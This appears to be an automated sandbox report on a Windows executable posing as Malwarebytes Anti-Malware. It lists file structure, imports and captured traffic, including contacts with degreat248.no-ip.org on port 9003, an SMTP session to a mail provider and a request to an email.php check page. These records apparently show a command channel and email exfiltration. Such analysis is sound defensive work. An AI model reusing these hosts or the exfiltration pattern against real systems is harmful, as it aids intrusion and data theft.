add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x65000	0x2274	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x71000	0x1e40b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6a000	0x6728	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x69000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Xored PE	ZLIB Complexity	File Type	Characteristics
CODE	0x1000	0x5ad24	0x5ae00	6.5243296605	False	0.524592718363	data	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
DATA	0x5c000	0x7680	0x7800	7.61254516604	False	0.90732421875	data	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
BSS	0x64000	0xc59	0x0	0.0	False	0	empty	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata	0x65000	0x2274	0x2400	4.79366327448	False	0.350802951389	data	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tls	0x68000	0x10	0x0	0.0	False	0	empty	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata	0x69000	0x18	0x200	0.20058190744	False	0.048828125	ACB archive data	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0x6a000	0x6728	0x6800	6.64722908862	False	0.599834735577	data	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0x71000	0x1e40b0	0x1e4200	6.35873628983	False	0.728062770301	data	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	Xored PE
RT_CURSOR	0x71aa8	0x134	data			False
RT_CURSOR	0x71bdc	0x134	data			False
RT_CURSOR	0x71d10	0x134	data			False
RT_CURSOR	0x71e44	0x134	data			False
RT_CURSOR	0x71f78	0x134	data			False
RT_CURSOR	0x720ac	0x134	data			False
RT_CURSOR	0x721e0	0x134	data			False
RT_BITMAP	0x72314	0x1d0	data			False
RT_BITMAP	0x724e4	0x1e4	data			False
RT_BITMAP	0x726c8	0x1d0	data			False
RT_BITMAP	0x72898	0x1d0	data			False
RT_BITMAP	0x72a68	0x1d0	data			False
RT_BITMAP	0x72c38	0x1d0	data			False
RT_BITMAP	0x72e08	0x1d0	data			False
RT_BITMAP	0x72fd8	0x1d0	data			False
RT_BITMAP	0x731a8	0x1d0	data			False
RT_BITMAP	0x73378	0x1d0	data			False
RT_BITMAP	0x73548	0xe8	GLS_BINARY_LSB_FIRST			False
RT_ICON	0x73630	0x2e8	data	English	United States	False
RT_DIALOG	0x73918	0x52	data			False
RT_STRING	0x7396c	0x248	data			False
RT_STRING	0x73bb4	0x150	data			False
RT_STRING	0x73d04	0xe8	data			False
RT_STRING	0x73dec	0x138	Hitachi SH big-endian COFF object, not stripped			False
RT_STRING	0x73f24	0x3bc	data			False
RT_STRING	0x742e0	0x3a0	data			False
RT_STRING	0x74680	0x390	data			False
RT_STRING	0x74a10	0x3d0	DBase 3 index file			False
RT_STRING	0x74de0	0xf4	data			False
RT_STRING	0x74ed4	0xc4	data			False
RT_STRING	0x74f98	0x2e0	data			False
RT_STRING	0x75278	0x35c	data			False
RT_STRING	0x755d4	0x2b4	data			False
RT_RCDATA	0x75888	0x10	Sendmail frozen configuration			False
RT_RCDATA	0x75898	0x1e8	data			False
RT_RCDATA	0x75a80	0x33e	data			False
RT_GROUP_CURSOR	0x75dc0	0x14	Lotus 1-2-3			False
RT_GROUP_CURSOR	0x75dd4	0x14	Lotus 1-2-3			False
RT_GROUP_CURSOR	0x75de8	0x14	Lotus 1-2-3			False
RT_GROUP_CURSOR	0x75dfc	0x14	Lotus 1-2-3			False
RT_GROUP_CURSOR	0x75e10	0x14	Lotus 1-2-3			False
RT_GROUP_CURSOR	0x75e24	0x14	Lotus 1-2-3			False
RT_GROUP_CURSOR	0x75e38	0x14	Lotus 1-2-3			False
RT_GROUP_ICON	0x75e4c	0x14	MS Windows icon resource - 1 icon	English	United States	False
RT_VERSION	0x75e60	0x36c	data	English	United States	False
RT_HTML	0x761cc	0x1deee3	data	English	United States	False

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
user32.dll	GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll	lstrlenA, lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, OutputDebugStringA, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFileAttributesA, GetDiskFreeSpaceA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetConsoleCP, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageA, FlushInstructionCache, FindResourceA, FindFirstFileA, FindClose, FindAtomA, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll	WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EndDeferWindowPos, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DeferWindowPos, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreateWindowExA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, BeginDeferWindowPos, CharNextA, CharLowerBuffA, CharLowerA, AdjustWindowRectEx, ActivateKeyboardLayout
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayRedim, SafeArrayCreate, VariantChangeTypeEx, VariantCopyInd, VariantCopy, VariantClear, VariantInit
comctl32.dll	ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
comdlg32.dll	ChooseColorA, GetSaveFileNameA, GetOpenFileNameA

Version Infos

Description	Data
LegalCopyright	Malwarebytes Corporation. All rights reserved.
InternalName	mbam.exe
FileVersion	1.0.1.711
CompanyName	Malwarebytes Corporation
LegalTrademarks
ProductName	Malwarebytes Anti-Malware
ProductVersion	1.0.1.711
FileDescription	Malwarebytes Anti-Malware
OriginalFilename	mbam.exe
Translation	0x0409 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 7, 2015 18:53:13.085005999 CEST	60535	53	192.168.1.12	8.8.8.8
Sep 7, 2015 18:53:13.242759943 CEST	53	60535	8.8.8.8	192.168.1.12
Sep 7, 2015 18:53:15.121577978 CEST	54852	53	192.168.1.12	8.8.8.8
Sep 7, 2015 18:53:15.316456079 CEST	53	54852	8.8.8.8	192.168.1.12
Sep 7, 2015 18:53:17.643476009 CEST	49167	9003	192.168.1.12	197.211.52.12
Sep 7, 2015 18:53:17.643528938 CEST	9003	49167	197.211.52.12	192.168.1.12
Sep 7, 2015 18:53:17.643645048 CEST	49167	9003	192.168.1.12	197.211.52.12
Sep 7, 2015 18:53:17.644224882 CEST	49168	80	192.168.1.12	46.19.37.108
Sep 7, 2015 18:53:17.644254923 CEST	80	49168	46.19.37.108	192.168.1.12
Sep 7, 2015 18:53:17.644345045 CEST	49168	80	192.168.1.12	46.19.37.108
Sep 7, 2015 18:53:17.645087004 CEST	49168	80	192.168.1.12	46.19.37.108
Sep 7, 2015 18:53:17.645114899 CEST	80	49168	46.19.37.108	192.168.1.12
Sep 7, 2015 18:53:17.785907030 CEST	80	49168	46.19.37.108	192.168.1.12
Sep 7, 2015 18:53:17.787344933 CEST	49168	80	192.168.1.12	46.19.37.108
Sep 7, 2015 18:53:17.787462950 CEST	80	49168	46.19.37.108	192.168.1.12
Sep 7, 2015 18:53:17.787519932 CEST	49168	80	192.168.1.12	46.19.37.108
Sep 7, 2015 18:53:17.829292059 CEST	54742	53	192.168.1.12	8.8.8.8
Sep 7, 2015 18:53:17.880866051 CEST	53	54742	8.8.8.8	192.168.1.12
Sep 7, 2015 18:53:17.881727934 CEST	49169	587	192.168.1.12	74.201.154.90
Sep 7, 2015 18:53:17.881763935 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:17.881808996 CEST	49169	587	192.168.1.12	74.201.154.90
Sep 7, 2015 18:53:18.218528032 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:18.219067097 CEST	49169	587	192.168.1.12	74.201.154.90
Sep 7, 2015 18:53:18.219084024 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:18.654156923 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:18.855629921 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:18.855703115 CEST	49169	587	192.168.1.12	74.201.154.90
Sep 7, 2015 18:53:18.855859995 CEST	49169	587	192.168.1.12	74.201.154.90
Sep 7, 2015 18:53:18.855874062 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:19.051280022 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:19.063373089 CEST	49169	587	192.168.1.12	74.201.154.90
Sep 7, 2015 18:53:19.063401937 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:19.249650955 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:19.253587008 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:19.253597021 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:19.253710032 CEST	49169	587	192.168.1.12	74.201.154.90
Sep 7, 2015 18:53:19.253727913 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:19.483597994 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:19.483860016 CEST	49169	587	192.168.1.12	74.201.154.90
Sep 7, 2015 18:53:19.486568928 CEST	49169	587	192.168.1.12	74.201.154.90
Sep 7, 2015 18:53:19.486603975 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:19.680349112 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:19.947181940 CEST	49169	587	192.168.1.12	74.201.154.90
Sep 7, 2015 18:53:19.947226048 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:20.150628090 CEST	49169	587	192.168.1.12	74.201.154.90
Sep 7, 2015 18:53:20.215050936 CEST	49169	587	192.168.1.12	74.201.154.90
Sep 7, 2015 18:53:20.215065956 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:20.402030945 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:20.651091099 CEST	49169	587	192.168.1.12	74.201.154.90
Sep 7, 2015 18:53:20.651113033 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:20.652417898 CEST	49169	587	192.168.1.12	74.201.154.90
Sep 7, 2015 18:53:20.652439117 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:20.836746931 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:20.837995052 CEST	49169	587	192.168.1.12	74.201.154.90
Sep 7, 2015 18:53:20.838016033 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:21.031735897 CEST	49167	9003	192.168.1.12	197.211.52.12
Sep 7, 2015 18:53:21.031764030 CEST	9003	49167	197.211.52.12	192.168.1.12
Sep 7, 2015 18:53:21.047002077 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:21.047720909 CEST	49169	587	192.168.1.12	74.201.154.90
Sep 7, 2015 18:53:21.047744036 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:21.247612953 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:21.248091936 CEST	49169	587	192.168.1.12	74.201.154.90
Sep 7, 2015 18:53:21.248106956 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:21.440623045 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:21.441090107 CEST	49169	587	192.168.1.12	74.201.154.90
Sep 7, 2015 18:53:21.441106081 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:21.624645948 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:21.629769087 CEST	49169	587	192.168.1.12	74.201.154.90
Sep 7, 2015 18:53:21.629810095 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:21.630841017 CEST	49169	587	192.168.1.12	74.201.154.90
Sep 7, 2015 18:53:21.630871058 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:21.631115913 CEST	49169	587	192.168.1.12	74.201.154.90
Sep 7, 2015 18:53:21.631138086 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:21.631407022 CEST	49169	587	192.168.1.12	74.201.154.90
Sep 7, 2015 18:53:21.631428957 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:22.012974977 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:22.085021019 CEST	49169	587	192.168.1.12	74.201.154.90
Sep 7, 2015 18:53:22.085171938 CEST	587	49169	74.201.154.90	192.168.1.12
Sep 7, 2015 18:53:22.085287094 CEST	49169	587	192.168.1.12	74.201.154.90
Sep 7, 2015 18:53:24.171124935 CEST	64337	53	192.168.1.12	8.8.8.8
Sep 7, 2015 18:53:24.222912073 CEST	53	64337	8.8.8.8	192.168.1.12
Sep 7, 2015 18:53:24.243530989 CEST	49170	80	192.168.1.12	216.58.208.196
Sep 7, 2015 18:53:24.243572950 CEST	80	49170	216.58.208.196	192.168.1.12
Sep 7, 2015 18:53:24.244344950 CEST	49170	80	192.168.1.12	216.58.208.196
Sep 7, 2015 18:53:24.245110035 CEST	49170	80	192.168.1.12	216.58.208.196
Sep 7, 2015 18:53:24.245246887 CEST	80	49170	216.58.208.196	192.168.1.12
Sep 7, 2015 18:53:24.245359898 CEST	49170	80	192.168.1.12	216.58.208.196
Sep 7, 2015 18:53:24.343564034 CEST	64351	53	192.168.1.12	8.8.8.8
Sep 7, 2015 18:53:24.427047968 CEST	53	64351	8.8.8.8	192.168.1.12
Sep 7, 2015 18:53:24.435393095 CEST	49171	80	192.168.1.12	31.170.160.229
Sep 7, 2015 18:53:24.435425997 CEST	80	49171	31.170.160.229	192.168.1.12
Sep 7, 2015 18:53:24.435516119 CEST	49171	80	192.168.1.12	31.170.160.229
Sep 7, 2015 18:53:24.436077118 CEST	49171	80	192.168.1.12	31.170.160.229
Sep 7, 2015 18:53:24.436103106 CEST	80	49171	31.170.160.229	192.168.1.12
Sep 7, 2015 18:53:24.807142973 CEST	80	49171	31.170.160.229	192.168.1.12
Sep 7, 2015 18:53:24.807261944 CEST	49171	80	192.168.1.12	31.170.160.229
Sep 7, 2015 18:53:24.812972069 CEST	49171	80	192.168.1.12	31.170.160.229
Sep 7, 2015 18:53:24.813060999 CEST	80	49171	31.170.160.229	192.168.1.12
Sep 7, 2015 18:53:24.813155890 CEST	49171	80	192.168.1.12	31.170.160.229
Sep 7, 2015 18:53:27.320557117 CEST	49172	80	192.168.1.12	31.170.160.229
Sep 7, 2015 18:53:27.320590019 CEST	80	49172	31.170.160.229	192.168.1.12
Sep 7, 2015 18:53:27.320676088 CEST	49172	80	192.168.1.12	31.170.160.229
Sep 7, 2015 18:53:27.321223021 CEST	49172	80	192.168.1.12	31.170.160.229
Sep 7, 2015 18:53:27.321249962 CEST	80	49172	31.170.160.229	192.168.1.12
Sep 7, 2015 18:53:27.321363926 CEST	49172	80	192.168.1.12	31.170.160.229
Sep 7, 2015 18:53:27.321374893 CEST	80	49172	31.170.160.229	192.168.1.12
Sep 7, 2015 18:53:27.788897991 CEST	80	49172	31.170.160.229	192.168.1.12
Sep 7, 2015 18:53:27.789066076 CEST	49172	80	192.168.1.12	31.170.160.229
Sep 7, 2015 18:53:27.838538885 CEST	80	49172	31.170.160.229	192.168.1.12
Sep 7, 2015 18:53:27.838601112 CEST	80	49172	31.170.160.229	192.168.1.12
Sep 7, 2015 18:53:27.838737011 CEST	49172	80	192.168.1.12	31.170.160.229
Sep 7, 2015 18:53:27.839098930 CEST	49172	80	192.168.1.12	31.170.160.229
Sep 7, 2015 18:53:27.839131117 CEST	80	49172	31.170.160.229	192.168.1.12
Sep 7, 2015 18:53:36.325578928 CEST	49167	9003	192.168.1.12	197.211.52.12
Sep 7, 2015 18:53:37.172178030 CEST	55720	53	192.168.1.12	8.8.8.8
Sep 7, 2015 18:53:37.172310114 CEST	53	55720	8.8.8.8	192.168.1.12
Sep 7, 2015 18:53:37.174103022 CEST	49173	9003	192.168.1.12	197.211.52.12
Sep 7, 2015 18:53:37.174137115 CEST	9003	49173	197.211.52.12	192.168.1.12
Sep 7, 2015 18:53:37.174525976 CEST	49173	9003	192.168.1.12	197.211.52.12

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 7, 2015 18:53:13.085005999 CEST	60535	53	192.168.1.12	8.8.8.8
Sep 7, 2015 18:53:13.242759943 CEST	53	60535	8.8.8.8	192.168.1.12
Sep 7, 2015 18:53:15.121577978 CEST	54852	53	192.168.1.12	8.8.8.8
Sep 7, 2015 18:53:15.316456079 CEST	53	54852	8.8.8.8	192.168.1.12
Sep 7, 2015 18:53:17.829292059 CEST	54742	53	192.168.1.12	8.8.8.8
Sep 7, 2015 18:53:17.880866051 CEST	53	54742	8.8.8.8	192.168.1.12
Sep 7, 2015 18:53:24.171124935 CEST	64337	53	192.168.1.12	8.8.8.8
Sep 7, 2015 18:53:24.222912073 CEST	53	64337	8.8.8.8	192.168.1.12
Sep 7, 2015 18:53:24.343564034 CEST	64351	53	192.168.1.12	8.8.8.8
Sep 7, 2015 18:53:24.427047968 CEST	53	64351	8.8.8.8	192.168.1.12
Sep 7, 2015 18:53:37.172178030 CEST	55720	53	192.168.1.12	8.8.8.8
Sep 7, 2015 18:53:37.172310114 CEST	53	55720	8.8.8.8	192.168.1.12

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 7, 2015 18:53:13.085005999 CEST	192.168.1.12	8.8.8.8	0x7b55	Standard query (0)	degreat248.no-ip.org	A (IP address)	IN (0x0001)
Sep 7, 2015 18:53:15.121577978 CEST	192.168.1.12	8.8.8.8	0xf137	Standard query (0)	ip4.telize.com	A (IP address)	IN (0x0001)
Sep 7, 2015 18:53:17.829292059 CEST	192.168.1.12	8.8.8.8	0x4003	Standard query (0)	smtp.zoho.com	A (IP address)	IN (0x0001)
Sep 7, 2015 18:53:24.171124935 CEST	192.168.1.12	8.8.8.8	0xd9a9	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Sep 7, 2015 18:53:24.343564034 CEST	192.168.1.12	8.8.8.8	0x9153	Standard query (0)	degreat.host56.com	A (IP address)	IN (0x0001)
Sep 7, 2015 18:53:37.172178030 CEST	192.168.1.12	8.8.8.8	0xac27	Standard query (0)	degreat248.no-ip.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Replay Code	Name	Address	Type	Class
Sep 7, 2015 18:53:13.242759943 CEST	8.8.8.8	192.168.1.12	0x7b55	No error (0)	degreat248.no-ip.org	197.211.52.12	A (IP address)	IN (0x0001)
Sep 7, 2015 18:53:15.316456079 CEST	8.8.8.8	192.168.1.12	0xf137	No error (0)	ip4.telize.com	46.19.37.108	A (IP address)	IN (0x0001)
Sep 7, 2015 18:53:17.880866051 CEST	8.8.8.8	192.168.1.12	0x4003	No error (0)	smtp.zoho.com	74.201.154.90	A (IP address)	IN (0x0001)
Sep 7, 2015 18:53:24.222912073 CEST	8.8.8.8	192.168.1.12	0xd9a9	No error (0)	www.google.com	216.58.208.196	A (IP address)	IN (0x0001)
Sep 7, 2015 18:53:24.427047968 CEST	8.8.8.8	192.168.1.12	0x9153	No error (0)	degreat.host56.com	31.170.160.229	A (IP address)	IN (0x0001)
Sep 7, 2015 18:53:37.172310114 CEST	8.8.8.8	192.168.1.12	0xac27	No error (0)	degreat248.no-ip.org	197.211.52.12	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

ip4.telize.com

degreat.host56.com

HTTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Header	Total Bytes Transfered (KB)
Sep 7, 2015 18:53:17.645087004 CEST	49168	80	192.168.1.12	46.19.37.108	GET / HTTP/1.1 Host: ip4.telize.com Connection: Keep-Alive	2
Sep 7, 2015 18:53:17.785907030 CEST	80	49168	46.19.37.108	192.168.1.12	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Sep 2015 16:53:14 GMT Content-Type: text/plain Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Data Raw: 65 0d 0a 31 37 36 2e 33 31 2e 35 31 2e 31 39 39 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: e176.31.51.1990	2
Sep 7, 2015 18:53:24.436077118 CEST	49171	80	192.168.1.12	31.170.160.229	GET /email.php?action=check HTTP/1.1 User-Agent: MSIE 7.0 Host: degreat.host56.com Cache-Control: no-cache	14
